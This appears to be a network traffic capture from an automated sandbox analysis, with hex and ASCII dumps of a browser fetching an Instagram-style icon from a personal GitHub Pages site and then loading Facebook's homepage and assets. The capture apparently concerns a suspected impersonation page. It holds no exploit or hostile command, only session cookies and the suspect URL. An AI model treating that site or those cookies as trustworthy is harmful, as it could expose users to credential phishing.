                                                                                                                                                                                                                                Date: Sun, 29 Sep 2024 04:54:06 GMT
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                X-CID: 2


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                15192.168.2.449756185.199.109.1534432992C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                2024-09-29 04:54:06 UTC374OUTGET /instagram.com/img/insta-fav.ico HTTP/1.1
                                                                                                                                                                                                                                Host: sayidanur.github.io
                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                Sec-Fetch-Site: none
                                                                                                                                                                                                                                Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                2024-09-29 04:54:07 UTC734INHTTP/1.1 200 OK
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                Content-Length: 5430
                                                                                                                                                                                                                                Server: GitHub.com
                                                                                                                                                                                                                                Content-Type: image/vnd.microsoft.icon
                                                                                                                                                                                                                                permissions-policy: interest-cohort=()
                                                                                                                                                                                                                                Last-Modified: Mon, 22 Jul 2024 06:05:07 GMT
                                                                                                                                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                Strict-Transport-Security: max-age=31556952
                                                                                                                                                                                                                                ETag: "669df693-1536"
                                                                                                                                                                                                                                expires: Sun, 29 Sep 2024 05:03:05 GMT
                                                                                                                                                                                                                                Cache-Control: max-age=600
                                                                                                                                                                                                                                x-proxy-cache: MISS
                                                                                                                                                                                                                                X-GitHub-Request-Id: 8FB6:115104:2A367B0:2EB1A97:66F8DD23
                                                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                                                Age: 62
                                                                                                                                                                                                                                Date: Sun, 29 Sep 2024 04:54:07 GMT
                                                                                                                                                                                                                                Via: 1.1 varnish
                                                                                                                                                                                                                                X-Served-By: cache-nyc-kteb1890091-NYC
                                                                                                                                                                                                                                X-Cache: HIT
                                                                                                                                                                                                                                X-Cache-Hits: 0
                                                                                                                                                                                                                                X-Timer: S1727585647.002580,VS0,VE1
                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                X-Fastly-Request-ID: 77b2f6ed94ca3496b2b5c68dbe3e69df7c744839
                                                                                                                                                                                                                                2024-09-29 04:54:07 UTC1378INData Raw: 00 00 01 00 02 00 10 10 00 00 01 00 20 00 68 04 00 00 26 00 00 00 20 20 00 00 01 00 20 00 a8 10 00 00 8e 04 00 00 28 00 00 00 10 00 00 00 20 00 00 00 01 00 20 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 74 d2 fb 39 7d dd ff 72 85 de ff d7 86 e0 ff ff 80 da ff ff 78 d2 fe ff 6c c6 fe ff 5f b3 fd ff 55 9a fc ff 4f 78 f4 d8 54 52 ed 73 65 39 e0 3a 00 00 00 00 00 00 00 00 00 ff ff 01 55 b8 fb 81 64 ca ff fa 6f d6 ff ff 6a d1 ff ff 67 cd fe ff 63 c8 fe ff 5c bf fd ff 53 b1 fc ff 48 9c fb ff 40 80 f7 ff 42 62 f4 ff 57 4d f4 ff 6d 37 e5 fb 7a 2c d8 84 ff 00 ff 01 3b 96 f6 38 43 a4 fc fd 48 b0 fe ff 52 b8 fd ff 92 d6 fe ff b6 e4 ff ff bb e5 ff ff bb e2 fe ff b8 dc fe ff b2 d1 fd ff a8 c0 fb ff 85 90 f5 ff 5a
                                                                                                                                                                                                                                Data Ascii: h& ( t9}rxl_UOxTRse9:Udojgc\SH@BbWMm7z,;8CHRZ
                                                                                                                                                                                                                                2024-09-29 04:54:07 UTC1378INData Raw: 7b d8 fe ff 79 d6 fe ff 76 d3 fe ff 72 cf fe ff 6d ca fe ff 68 c4 fd ff 63 bc fd ff 5d b3 fc ff 57 a8 fc ff 52 9c fa ff 4e 8e f8 ff 4c 7e f5 ff 4c 6e f4 ff 51 5d f7 ff 58 4e f2 ff 60 42 e7 fd 6c 37 e3 cb 73 2f da 52 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 56 b9 fd 74 5f c4 fe fd 65 cb ff ff 66 ca ff ff 6a cd fe ff 6d cf fe ff 6f d1 fe ff 70 d1 fe ff 70 d1 fe ff 6f d0 fe ff 6d ce fe ff 6a cb fe ff 67 c6 fe ff 63 c1 fd ff 5e bb fd ff 59 b3 fc ff 54 a9 fc ff 4f 9e fb ff 4b 91 f9 ff 48 83 f6 ff 47 73 f4 ff 47 62 f1 ff 4c 52 ed ff 55 48 e9 ff 60 3e e5 ff 6f 35 e6 ff 78 2f e0 fe 7b 2e d9 7a 00 00 00 00 00 00 00 00 00 00 00 00 4a a8 f8 4c 4f b2 fe fd 52 b8 ff ff 56 bc fd ff 5a c0 fd ff 5d c4 fe ff 60 c6 fe ff 60 c7 fe ff 5d c6 fe ff 5a c4 fe
                                                                                                                                                                                                                                Data Ascii: {yvrmhc]WRNL~LnQ]XN`Bl7s/RVt_efjmoppomjgc^YTOKHGsGbLRUH`>o5x/{.zJLORVZ]``]Z
                                                                                                                                                                                                                                2024-09-29 04:54:07 UTC1378INData Raw: e2 ff a4 af f2 ff ff ff ff ff a5 b5 f6 ff 34 5b ec ff 3d 65 ef ff 3b 64 f0 ff 3d 62 f0 ff c8 d3 fb ff ff ff ff ff ed ef fe ff 95 9f f6 ff 65 71 f1 ff 68 6f f1 ff 9c 9b f4 ff f0 f0 fd ff ff ff ff ff cc c3 f8 ff 5f 33 e5 ff 68 2c e3 ff 6e 2b e1 ff 67 22 dd ff bf a3 f0 ff ff ff ff ff b7 92 eb ff 74 24 d6 ff 82 2f d8 ff 86 30 d6 ff 89 30 d4 ff 66 50 cd ff 60 53 d3 ff 59 56 d8 ff 4a 4e db ff aa ae f0 ff ff ff ff ff a6 ae f3 ff 3d 53 e7 ff 45 5c eb ff 3d 55 eb ff 87 95 f3 ff ff ff ff ff ed ee fd ff 63 6b ef ff 3a 42 eb ff 44 46 eb ff 48 42 ea ff 44 35 e7 ff 72 60 eb ff f1 ee fd ff ff ff ff ff 9a 73 eb ff 67 23 df ff 70 2b df ff 6a 22 db ff be a0 ef ff ff ff ff ff ba 96 eb ff 76 24 d5 ff 84 2f d7 ff 88 30 d5 ff 8c 2e d3 ff 71 47 c4 ff 6b 4a ca ff 64 4d d1 ff 54
                                                                                                                                                                                                                                Data Ascii: 4[=e;d=beqho_3h,n+g"t$/00fP`SYVJN=SE\=Uck:BDFHBD5r`sg#p+j"v$/0.qGkJdMT
                                                                                                                                                                                                                                2024-09-29 04:54:07 UTC1296INData Raw: 9c 2a bf ff a3 31 c0 ff a5 31 be ff a7 31 bd ff ae 3c 7c d3 af 3c 81 ff aa 3b 82 ff a6 38 85 ff a5 43 90 ff f3 e8 f2 ff ff ff ff ff b9 7e be ff 8d 27 99 ff 95 33 a7 ff 95 35 ad ff 94 35 b1 ff 93 34 b4 ff 92 33 b6 ff 90 33 b8 ff 8e 31 ba ff 8e 31 bb ff 8f 32 bd ff 91 31 be ff 91 2f be ff 90 2c bc ff b4 72 d0 ff bb 83 d3 ff 85 22 b1 ff b7 7d d1 ff ff ff ff ff f1 e3 f6 ff a2 38 be ff a2 2f bc ff a6 32 bb ff a8 32 ba ff ae 33 bc ff b3 3c 76 80 ba 3e 7d ff b0 3c 7c ff ad 3b 7f ff a4 32 7d ff cc 91 bb ff ff ff ff ff f9 f3 f8 ff bc 7f bc ff 98 38 9c ff 93 2d 9d ff 92 2c a1 ff 91 2b a5 ff 90 2a a8 ff 8f 29 ab ff 8f 28 ad ff 90 27 ae ff 91 26 b0 ff 91 25 b0 ff 91 25 b0 ff 8f 23 af ff 88 1c ab ff 8b 26 ad ff b9 7c ce ff fa f5 fb ff ff ff ff ff c8 87 d4 ff a0 29 b4
                                                                                                                                                                                                                                Data Ascii: *111<|<;8C~'3554331121/,r"}8/223<v>}<|;2}8-,+*)('&%%#&|)


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                16192.168.2.449757184.28.90.27443
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                2024-09-29 04:54:07 UTC239OUTGET /fs/windows/config.json HTTP/1.1
                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                Accept-Encoding: identity
                                                                                                                                                                                                                                If-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMT
                                                                                                                                                                                                                                Range: bytes=0-2147483646
                                                                                                                                                                                                                                User-Agent: Microsoft BITS/7.8
                                                                                                                                                                                                                                Host: fs.microsoft.com
                                                                                                                                                                                                                                2024-09-29 04:54:07 UTC515INHTTP/1.1 200 OK
                                                                                                                                                                                                                                ApiVersion: Distribute 1.1
                                                                                                                                                                                                                                Content-Disposition: attachment; filename=config.json; filename*=UTF-8''config.json
                                                                                                                                                                                                                                Content-Type: application/octet-stream
                                                                                                                                                                                                                                ETag: "0x64667F707FF07D62B733DBCB79EFE3855E6886C9975B0C0B467D46231B3FA5E7"
                                                                                                                                                                                                                                Last-Modified: Tue, 16 May 2017 22:58:00 GMT
                                                                                                                                                                                                                                Server: ECAcc (lpl/EF06)
                                                                                                                                                                                                                                X-CID: 11
                                                                                                                                                                                                                                X-Ms-ApiVersion: Distribute 1.2
                                                                                                                                                                                                                                X-Ms-Region: prod-weu-z1
                                                                                                                                                                                                                                Cache-Control: public, max-age=129085
                                                                                                                                                                                                                                Date: Sun, 29 Sep 2024 04:54:07 GMT
                                                                                                                                                                                                                                Content-Length: 55
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                X-CID: 2
                                                                                                                                                                                                                                2024-09-29 04:54:07 UTC55INData Raw: 7b 22 66 6f 6e 74 53 65 74 55 72 69 22 3a 22 66 6f 6e 74 73 65 74 2d 32 30 31 37 2d 30 34 2e 6a 73 6f 6e 22 2c 22 62 61 73 65 55 72 69 22 3a 22 66 6f 6e 74 73 22 7d
                                                                                                                                                                                                                                Data Ascii: {"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                17192.168.2.449761157.240.253.354432992C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                2024-09-29 04:54:15 UTC652OUTGET /?locale=ru_RU HTTP/1.1
                                                                                                                                                                                                                                Host: www.facebook.com
                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                Upgrade-Insecure-Requests: 1
                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                                                                                Sec-Fetch-Site: none
                                                                                                                                                                                                                                Sec-Fetch-Mode: navigate
                                                                                                                                                                                                                                Sec-Fetch-Dest: document
                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                2024-09-29 04:54:16 UTC1120INHTTP/1.1 200 OK
                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                Set-Cookie: fr=0EP1BYCUXVNSi8ERK..Bm-N13..AAA.0.0.Bm-N13.AWXfEaJCEFA; expires=Sat, 28-Dec-2024 04:54:15 GMT; Max-Age=7776000; path=/; domain=.facebook.com; secure; httponly; SameSite=None
                                                                                                                                                                                                                                Set-Cookie: sb=d934Zki5Wi7DXL1gbpG7s1V5; expires=Mon, 03-Nov-2025 04:54:15 GMT; Max-Age=34560000; path=/; domain=.facebook.com; secure; httponly; SameSite=None
                                                                                                                                                                                                                                reporting-endpoints: coop_report="https://www.facebook.com/browser_reporting/coop/?minimize=0", default="https://www.facebook.com/ajax/browser_error_reports/?device_level=unknown&brsid=7419923890061341413", permissions_policy="https://www.facebook.com/ajax/browser_error_reports/"
                                                                                                                                                                                                                                report-to: {"max_age":2592000,"endpoints":[{"url":"https:\/\/www.facebook.com\/browser_reporting\/coop\/?minimize=0"}],"group":"coop_report","include_subdomains":true}, {"max_age":259200,"endpoints":[{"url":"https:\/\/www.facebook.com\/ajax\/browser_error_reports\/?device_level=unknown&brsid=7419923890061341413"}]}, {"max_age":21600,"endpoints":[{"url":"https:\/\/www.facebook.com\/ajax\/browser_error_reports\/"}],"group":"permissions_policy"}
                                                                                                                                                                                                                                2024-09-29 04:54:16 UTC1859INData Raw: 63 6f 6e 74 65 6e 74 2d 73 65 63 75 72 69 74 79 2d 70 6f 6c 69 63 79 3a 20 64 65 66 61 75 6c 74 2d 73 72 63 20 64 61 74 61 3a 20 62 6c 6f 62 3a 20 27 73 65 6c 66 27 20 68 74 74 70 73 3a 2f 2f 2a 2e 66 62 73 62 78 2e 63 6f 6d 20 27 75 6e 73 61 66 65 2d 69 6e 6c 69 6e 65 27 20 2a 2e 66 61 63 65 62 6f 6f 6b 2e 63 6f 6d 20 2a 2e 66 62 63 64 6e 2e 6e 65 74 20 27 75 6e 73 61 66 65 2d 65 76 61 6c 27 3b 73 63 72 69 70 74 2d 73 72 63 20 2a 2e 66 61 63 65 62 6f 6f 6b 2e 63 6f 6d 20 2a 2e 66 62 63 64 6e 2e 6e 65 74 20 2a 2e 66 61 63 65 62 6f 6f 6b 2e 6e 65 74 20 31 32 37 2e 30 2e 30 2e 31 3a 2a 20 27 75 6e 73 61 66 65 2d 69 6e 6c 69 6e 65 27 20 62 6c 6f 62 3a 20 64 61 74 61 3a 20 27 73 65 6c 66 27 20 63 6f 6e 6e 65 63 74 2e 66 61 63 65 62 6f 6f 6b 2e 6e 65 74 20 27
                                                                                                                                                                                                                                Data Ascii: content-security-policy: default-src data: blob: 'self' https://*.fbsbx.com 'unsafe-inline' *.facebook.com *.fbcdn.net 'unsafe-eval';script-src *.facebook.com *.fbcdn.net *.facebook.net 127.0.0.1:* 'unsafe-inline' blob: data: 'self' connect.facebook.net '
                                                                                                                                                                                                                                2024-09-29 04:54:16 UTC1701INData Raw: 70 65 72 6d 69 73 73 69 6f 6e 73 2d 70 6f 6c 69 63 79 3a 20 61 63 63 65 6c 65 72 6f 6d 65 74 65 72 3d 28 29 2c 20 61 74 74 72 69 62 75 74 69 6f 6e 2d 72 65 70 6f 72 74 69 6e 67 3d 28 73 65 6c 66 29 2c 20 61 75 74 6f 70 6c 61 79 3d 28 29 2c 20 62 6c 75 65 74 6f 6f 74 68 3d 28 29 2c 20 62 72 6f 77 73 69 6e 67 2d 74 6f 70 69 63 73 3d 28 73 65 6c 66 29 2c 20 63 61 6d 65 72 61 3d 28 73 65 6c 66 29 2c 20 63 68 2d 64 65 76 69 63 65 2d 6d 65 6d 6f 72 79 3d 28 29 2c 20 63 68 2d 64 6f 77 6e 6c 69 6e 6b 3d 28 29 2c 20 63 68 2d 64 70 72 3d 28 29 2c 20 63 68 2d 65 63 74 3d 28 29 2c 20 63 68 2d 72 74 74 3d 28 29 2c 20 63 68 2d 73 61 76 65 2d 64 61 74 61 3d 28 29 2c 20 63 68 2d 75 61 2d 61 72 63 68 3d 28 29 2c 20 63 68 2d 75 61 2d 62 69 74 6e 65 73 73 3d 28 29 2c 20 63
                                                                                                                                                                                                                                Data Ascii: permissions-policy: accelerometer=(), attribution-reporting=(self), autoplay=(), bluetooth=(), browsing-topics=(self), camera=(self), ch-device-memory=(), ch-downlink=(), ch-dpr=(), ch-ect=(), ch-rtt=(), ch-save-data=(), ch-ua-arch=(), ch-ua-bitness=(), c
                                                                                                                                                                                                                                2024-09-29 04:54:16 UTC1500INData Raw: 34 61 66 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 72 75 22 20 69 64 3d 22 66 61 63 65 62 6f 6f 6b 22 20 63 6c 61 73 73 3d 22 6e 6f 5f 6a 73 22 3e 0a 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 65 66 65 72 72 65 72 22 20 63 6f 6e 74 65 6e 74 3d 22 6f 72 69 67 69 6e 2d 77 68 65 6e 2d 63 72 6f 73 73 6f 72 69 67 69 6e 22 20 69 64 3d 22 6d 65 74 61 5f 72 65 66 65 72 72 65 72 22 20 2f 3e 3c 73 63 72 69 70 74 20 6e 6f 6e 63 65 3d 22 57 63 4f 42 74 45 74 75 22 3e 66 75 6e 63 74 69 6f 6e 20 65 6e 76 46 6c 75 73 68 28 61 29 7b 66 75 6e 63 74 69 6f 6e 20 62 28 62 29 7b 66 6f 72 28 76 61 72 20 63 20 69 6e 20 61 29 62 5b 63 5d 3d 61
                                                                                                                                                                                                                                Data Ascii: 4af0<!DOCTYPE html><html lang="ru" id="facebook" class="no_js"><head><meta charset="utf-8" /><meta name="referrer" content="origin-when-crossorigin" id="meta_referrer" /><script nonce="WcOBtEtu">function envFlush(a){function b(b){for(var c in a)b[c]=a
                                                                                                                                                                                                                                2024-09-29 04:54:16 UTC1500INData Raw: 63 6f 6d 2f 69 6d 61 67 65 73 2f 66 62 5f 69 63 6f 6e 5f 33 32 35 78 33 32 35 2e 70 6e 67 22 20 2f 3e 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 6c 6f 63 61 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 72 75 5f 52 55 22 20 2f 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 6d 65 64 69 61 3d 22 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 20 36 34 30 70 78 29 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 6d 2e 66 61 63 65 62 6f 6f 6b 2e 63 6f 6d 2f 22 20 2f 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 6d 65 64 69 61 3d 22 68 61 6e 64 68 65 6c 64 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 6d 2e 66 61 63 65 62 6f 6f 6b 2e 63 6f 6d 2f 22 20 2f 3e 3c 6d 65 74 61 20
                                                                                                                                                                                                                                Data Ascii: com/images/fb_icon_325x325.png" /><meta property="og:locale" content="ru_RU" /><link rel="alternate" media="only screen and (max-width: 640px)" href="https://m.facebook.com/" /><link rel="alternate" media="handheld" href="https://m.facebook.com/" /><meta
                                                                                                                                                                                                                                2024-09-29 04:54:16 UTC1500INData Raw: 63 72 6f 73 73 6f 72 69 67 69 6e 3d 22 61 6e 6f 6e 79 6d 6f 75 73 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 74 61 74 69 63 2e 78 78 2e 66 62 63 64 6e 2e 6e 65 74 2f 72 73 72 63 2e 70 68 70 2f 76 33 2f 79 4d 2f 6c 2f 30 2c 63 72 6f 73 73 2f 38 4b 39 63 49 33 6e 51 72 30 6a 2e 63 73 73 22 20 64 61 74 61 2d 62 6f 6f 74 6c 6f 61 64 65 72 2d 68 61 73 68 3d 22 36 32 46 79 34 53 65 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3d 22 61 6e 6f 6e 79 6d 6f 75 73 22 20 2f 3e 0a 3c 73 63 72 69 70 74 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 73 74 61 74 69 63 2e 78 78 2e 66 62 63 64 6e 2e 6e 65 74 2f 72 73 72 63 2e 70 68 70 2f 76 33 2f 79 31
                                                                                                                                                                                                                                Data Ascii: crossorigin="anonymous" /><link type="text/css" rel="stylesheet" href="https://static.xx.fbcdn.net/rsrc.php/v3/yM/l/0,cross/8K9cI3nQr0j.css" data-bootloader-hash="62Fy4Se" crossorigin="anonymous" /><script src="https://static.xx.fbcdn.net/rsrc.php/v3/y1
                                                                                                                                                                                                                                2024-09-29 04:54:16 UTC1500INData Raw: 75 6c 74 22 3a 74 72 75 65 2c 22 68 61 73 68 22 3a 6e 75 6c 6c 7d 2c 22 32 30 39 38 35 22 3a 7b 22 72 65 73 75 6c 74 22 3a 66 61 6c 73 65 2c 22 68 61 73 68 22 3a 6e 75 6c 6c 7d 2c 22 32 30 39 38 36 22 3a 7b 22 72 65 73 75 6c 74 22 3a 66 61 6c 73 65 2c 22 68 61 73 68 22 3a 6e 75 6c 6c 7d 2c 22 32 30 39 38 37 22 3a 7b 22 72 65 73 75 6c 74 22 3a 66 61 6c 73 65 2c 22 68 61 73 68 22 3a 6e 75 6c 6c 7d 2c 22 32 30 39 38 38 22 3a 7b 22 72 65 73 75 6c 74 22 3a 74 72 75 65 2c 22 68 61 73 68 22 3a 6e 75 6c 6c 7d 2c 22 32 31 30 34 33 22 3a 7b 22 72 65 73 75 6c 74 22 3a 66 61 6c 73 65 2c 22 68 61 73 68 22 3a 6e 75 6c 6c 7d 2c 22 32 31 30 35 30 22 3a 7b 22 72 65 73 75 6c 74 22 3a 66 61 6c 73 65 2c 22 68 61 73 68 22 3a 6e 75 6c 6c 7d 2c 22 32 31 30 35 31 22 3a 7b 22 72
                                                                                                                                                                                                                                Data Ascii: ult":true,"hash":null},"20985":{"result":false,"hash":null},"20986":{"result":false,"hash":null},"20987":{"result":false,"hash":null},"20988":{"result":true,"hash":null},"21043":{"result":false,"hash":null},"21050":{"result":false,"hash":null},"21051":{"r
                                                                                                                                                                                                                                2024-09-29 04:54:16 UTC1500INData Raw: 31 22 3a 7b 22 72 65 73 75 6c 74 22 3a 66 61 6c 73 65 2c 22 68 61 73 68 22 3a 6e 75 6c 6c 7d 7d 2c 22 71 65 78 44 61 74 61 22 3a 7b 22 33 36 32 22 3a 7b 22 72 22 3a 6e 75 6c 6c 7d 2c 22 35 32 36 22 3a 7b 22 72 22 3a 6e 75 6c 6c 7d 2c 22 35 33 38 22 3a 7b 22 72 22 3a 6e 75 6c 6c 7d 2c 22 35 34 33 22 3a 7b 22 72 22 3a 6e 75 6c 6c 7d 2c 22 31 30 32 38 22 3a 7b 22 72 22 3a 6e 75 6c 6c 7d 2c 22 31 37 35 32 22 3a 7b 22 72 22 3a 6e 75 6c 6c 7d 7d 2c 22 6a 75 73 74 6b 6e 6f 62 78 44 61 74 61 22 3a 7b 22 31 34 34 22 3a 7b 22 72 22 3a 74 72 75 65 7d 2c 22 34 35 30 22 3a 7b 22 72 22 3a 74 72 75 65 7d 2c 22 31 32 30 33 22 3a 7b 22 72 22 3a 74 72 75 65 7d 2c 22 31 34 31 37 22 3a 7b 22 72 22 3a 74 72 75 65 7d 2c 22 31 38 30 36 22 3a 7b 22 72 22 3a 74 72 75 65 7d 2c 22
                                                                                                                                                                                                                                Data Ascii: 1":{"result":false,"hash":null}},"qexData":{"362":{"r":null},"526":{"r":null},"538":{"r":null},"543":{"r":null},"1028":{"r":null},"1752":{"r":null}},"justknobxData":{"144":{"r":true},"450":{"r":true},"1203":{"r":true},"1417":{"r":true},"1806":{"r":true},"
                                                                                                                                                                                                                                2024-09-29 04:54:16 UTC1500INData Raw: 63 22 3a 5b 22 45 76 65 6e 74 50 72 6f 66 69 6c 65 72 49 6d 70 6c 22 2c 6e 75 6c 6c 5d 7d 2c 2d 31 5d 2c 5b 22 63 72 3a 31 33 35 22 2c 5b 22 52 75 6e 42 6c 75 65 22 5d 2c 7b 22 5f 5f 72 63 22 3a 5b 22 52 75 6e 42 6c 75 65 22 2c 6e 75 6c 6c 5d 7d 2c 2d 31 5d 2c 5b 22 63 72 3a 36 36 36 39 22 2c 5b 22 44 61 74 61 53 74 6f 72 65 22 5d 2c 7b 22 5f 5f 72 63 22 3a 5b 22 44 61 74 61 53 74 6f 72 65 22 2c 6e 75 6c 6c 5d 7d 2c 2d 31 5d 2c 5b 22 53 65 72 76 65 72 4e 6f 6e 63 65 22 2c 5b 5d 2c 7b 22 53 65 72 76 65 72 4e 6f 6e 63 65 22 3a 22 37 32 55 2d 4a 6c 36 74 42 6e 4a 6e 4d 51 36 79 70 4d 41 70 70 42 22 7d 2c 31 34 31 5d 2c 5b 22 4b 53 43 6f 6e 66 69 67 22 2c 5b 5d 2c 7b 22 6b 69 6c 6c 65 64 22 3a 7b 22 5f 5f 73 65 74 22 3a 5b 22 50 4f 43 4b 45 54 5f 4d 4f 4e 53
                                                                                                                                                                                                                                Data Ascii: c":["EventProfilerImpl",null]},-1],["cr:135",["RunBlue"],{"__rc":["RunBlue",null]},-1],["cr:6669",["DataStore"],{"__rc":["DataStore",null]},-1],["ServerNonce",[],{"ServerNonce":"72U-Jl6tBnJnMQ6ypMAppB"},141],["KSConfig",[],{"killed":{"__set":["POCKET_MONS
                                                                                                                                                                                                                                2024-09-29 04:54:16 UTC1500INData Raw: 6d 61 67 65 73 22 2c 22 74 65 6e 6f 72 5f 6d 65 64 69 61 22 2c 22 74 69 6b 74 6f 6b 5f 6f 65 6d 62 65 64 22 2c 22 74 77 69 74 74 65 72 5f 61 6e 61 6c 79 74 69 63 73 5f 70 69 78 65 6c 22 2c 22 74 77 69 74 74 65 72 5f 61 6e 61 6c 79 74 69 63 73 5f 70 69 78 65 6c 5f 69 6d 67 22 2c 22 74 77 69 74 74 65 72 5f 6c 65 67 61 63 79 5f 65 6d 62 65 64 22 2c 22 76 69 6d 65 6f 5f 6f 65 6d 62 65 64 22 2c 22 79 6f 75 74 75 62 65 5f 65 6d 62 65 64 22 2c 22 79 6f 75 74 75 62 65 5f 6f 65 6d 62 65 64 22 2c 22 61 64 76 65 72 74 69 73 65 72 5f 68 6f 73 74 65 64 5f 70 69 78 65 6c 22 2c 22 61 69 72 62 75 73 5f 73 61 74 22 2c 22 61 6d 61 7a 6f 6e 5f 6d 65 64 69 61 22 2c 22 61 70 70 73 5f 66 6f 72 5f 6f 66 66 69 63 65 22 2c 22 61 72 6b 6f 73 65 5f 63 61 70 74 63 68 61 22 2c 22 61
                                                                                                                                                                                                                                Data Ascii: mages","tenor_media","tiktok_oembed","twitter_analytics_pixel","twitter_analytics_pixel_img","twitter_legacy_embed","vimeo_oembed","youtube_embed","youtube_oembed","advertiser_hosted_pixel","airbus_sat","amazon_media","apps_for_office","arkose_captcha","a
                                                                                                                                                                                                                                2024-09-29 04:54:16 UTC1500INData Raw: 61 7a 6f 6e 5f 6d 65 64 69 61 22 2c 22 61 70 70 73 5f 66 6f 72 5f 6f 66 66 69 63 65 22 2c 22 61 72 6b 6f 73 65 5f 63 61 70 74 63 68 61 22 2c 22 61 73 70 6e 65 74 5f 63 64 6e 22 2c 22 61 75 74 6f 64 65 73 6b 5f 66 75 73 69 6f 6e 22 2c 22 62 69 6e 67 5f 6d 61 70 73 22 2c 22 62 69 6e 67 5f 77 69 64 67 65 74 22 2c 22 62 6c 69 6e 67 73 5f 69 6f 5f 76 69 64 65 6f 22 2c 22 62 6f 6b 75 5f 77 61 6c 6c 65 74 22 2c 22 62 6f 6f 74 73 74 72 61 70 22 2c 22 62 6f 78 22 2c 22 63 61 72 64 69 6e 61 6c 5f 63 65 6e 74 69 6e 65 6c 5f 61 70 69 22 2c 22 63 68 72 6f 6d 65 63 61 73 74 5f 65 78 74 65 6e 73 69 6f 6e 73 22 2c 22 63 6c 6f 75 64 66 6c 61 72 65 5f 63 64 6e 6a 73 22 2c 22 63 6c 6f 75 64 66 6c 61 72 65 5f 64 61 74 61 74 61 62 6c 65 73 22 2c 22 63 6c 6f 75 64 66 6c 61 72
                                                                                                                                                                                                                                Data Ascii: azon_media","apps_for_office","arkose_captcha","aspnet_cdn","autodesk_fusion","bing_maps","bing_widget","blings_io_video","boku_wallet","bootstrap","box","cardinal_centinel_api","chromecast_extensions","cloudflare_cdnjs","cloudflare_datatables","cloudflar


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                18192.168.2.449765157.240.251.94432992C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                2024-09-29 04:54:17 UTC604OUTGET /rsrc.php/v3/yG/l/0,cross/sz9JnoPJuhF.css HTTP/1.1
                                                                                                                                                                                                                                Host: static.xx.fbcdn.net
                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                Origin: https://www.facebook.com
